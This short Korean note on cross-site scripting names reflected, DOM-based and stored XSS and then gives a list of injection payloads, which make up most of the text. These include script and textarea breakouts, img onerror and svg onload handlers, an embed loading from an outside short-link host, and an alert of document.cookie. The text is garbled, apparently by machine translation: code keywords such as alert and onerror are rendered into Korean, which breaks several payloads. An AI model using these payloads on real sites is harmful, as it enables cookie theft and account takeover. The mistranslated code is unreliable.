XSS (크로스 사이트 스크립팅)
분류 : 반사 XSS
2.DOM 형 XSS
3. 저장 형 XSS
이것은 특정 파고의 XSS이다
XSS 저장 형식이 의견에 나타날 수,학과 및 기타 개인 정보
부품 xsspaload :
"> <script> 경보 (1) </ script> //
<IMG SRC = X의 OnError = 경고 (2)>
<SVG / 온로드 = alert`1`>
<삽입 SRC = // tiny.cc>
</ 텍스트 영역 > <script> 경보 (document.cookie를) </ script> <텍스트 영역>
</ SPAN> <IMG SRC = X의 OnError 경고 = 1> <SPAN>
모든 입력이 가능한 XSS, XSS의 관심은 단지 상자를 폭격없는 장소
사용 : XSS + CSRF
Mangda 플랫폼
...